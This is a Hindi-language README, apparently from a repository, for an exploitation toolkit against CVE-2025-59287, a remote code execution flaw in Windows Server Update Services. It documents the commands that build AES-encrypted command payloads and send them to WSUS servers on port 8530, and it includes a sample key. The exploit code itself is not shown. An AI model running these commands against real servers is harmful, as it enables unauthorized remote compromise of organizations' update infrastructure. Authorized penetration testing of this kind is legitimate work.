
CVE-2025-59287 के लिए शोषण टूलकिट, एक WSUS RCE कमजोरी, जिसमें AES पेलोड एन्क्रिप्शन और अधिकृत पेनेट्रेशन टेस्टिंग के लिए पूर्ण शोषण श्रृंखला शामिल है।
CVE-2025-59287 - WSUS शोषण टूलकिट
द्वारा: adel-h4x0a
⚠️ केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए ⚠️
अवलोकन
यह टूलकिट CVE-2025-59287 का शोषण प्रदर्शित करता है, जो Windows Server Update Services (WSUS) में एक रिमोट कोड निष्पादन भेद्यता है।
घटक
· WSUS संचार के लिए AES पेलोड एन्क्रिप्शन · विरासत और सुरक्षित एन्क्रिप्शन मोड दोनों के लिए समर्थन · कस्टम पेलोड जनरेशन
· CVE-2025-59287 के लिए पूर्ण शोषण श्रृंखला · मजबूत त्रुटि प्रबंधन और पुनर्प्रयास तर्क · कस्टम पेलोड समर्थन
संरचना
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py # एन्क्रिप्शन मॉड्यूल
├── 📄 cve-2025-59287-exp.py # शोषण मॉड्यूल
├── 📄 requirements.txt # निर्भरताएँ
└── 📄 README.md # यह फ़ाइल
उपयोग
आवश्यक शर्तें
pip install -r requirements.txt
एन्क्रिप्शन
# मूल एन्क्रिप्शन
python cve-2025-59287-encr.py --command "calc" --mode legacy
# कस्टम कुंजी के साथ एन्क्रिप्शन
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"
# आउटपुट को फ़ाइल में सहेजें
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt
शोषण
# मूल शोषण
python cve-2025-59287-exp.py http://wsus-server:8530
# कस्टम पेलोड के साथ
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt
# उन्नत सेटिंग्स के साथ
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5
विकल्प
एन्क्रिप्शन मॉड्यूल (cve-2025-59287-encr.py)
· --key: हेक्स प्रारूप में AES कुंजी (वैकल्पिक)
· --command: निष्पादित करने का आदेश (डिफ़ॉल्ट: calc)
· --mode: एन्क्रिप्शन मोड [legacy, secure] (डिफ़ॉल्ट: legacy)
· --output: पेलोड सहेजने के लिए आउटपुट फ़ाइल (वैकल्पिक)
शोषण मॉड्यूल (cve-2025-59287-exp.py)
· target: WSUS सर्वर URL (आवश्यक) · --payload: कस्टम बेस64 पेलोड फ़ाइल (वैकल्पिक) · --timeout: सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 30) · --retries: पुनर्प्रयास प्रयासों की संख्या (डिफ़ॉल्ट: 3) · --no-banner: बैनर प्रदर्शन दबाएं (वैकल्पिक)
पूर्ण उदाहरण
# कस्टम पेलोड जनरेट करें
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt
# शोषण निष्पादित करें
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt
कानूनी अस्वीकरण
❗ महत्वपूर्ण चेतावनी:
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पेनिट्रेशन परीक्षण के लिए प्रदान किया गया है। उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध है।
इस उपकरण का उपयोग केवल इसमें किया जाना चाहिए:
· परीक्षण वातावरण जो आपके स्वामित्व में हैं · वे प्रणालियाँ जिनके परीक्षण के लिए आपने लिखित अनुमति प्राप्त की है · शैक्षिक और शैक्षणिक उद्देश्य
डेवलपर इस उपकरण के किसी भी अवैध या अनधिकृत उपयोग के लिए जिम्मेदार नहीं है।
लाइसेंस
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है।
अपडेट
· v1.0: पूर्ण शोषण समर्थन के साथ प्रारंभिक रिलीज़ · v1.1: उन्नत त्रुटि प्रबंधन और लॉगिंग सुधार
योगदान
बग रिपोर्ट और पुल रिक्वेस्ट को उपकरण को जिम्मेदार और नैतिक उपयोग के ढांचे के भीतर बेहतर बनाने के लिए प्रोत्साहित किया जाता है।
नोट: किसी भी प्रणाली का परीक्षण करने से पहले हमेशा लिखित अनुमति प्राप्त करें। सुरक्षा जागरूकता जिम्मेदारी से शुरू होती है। 🔒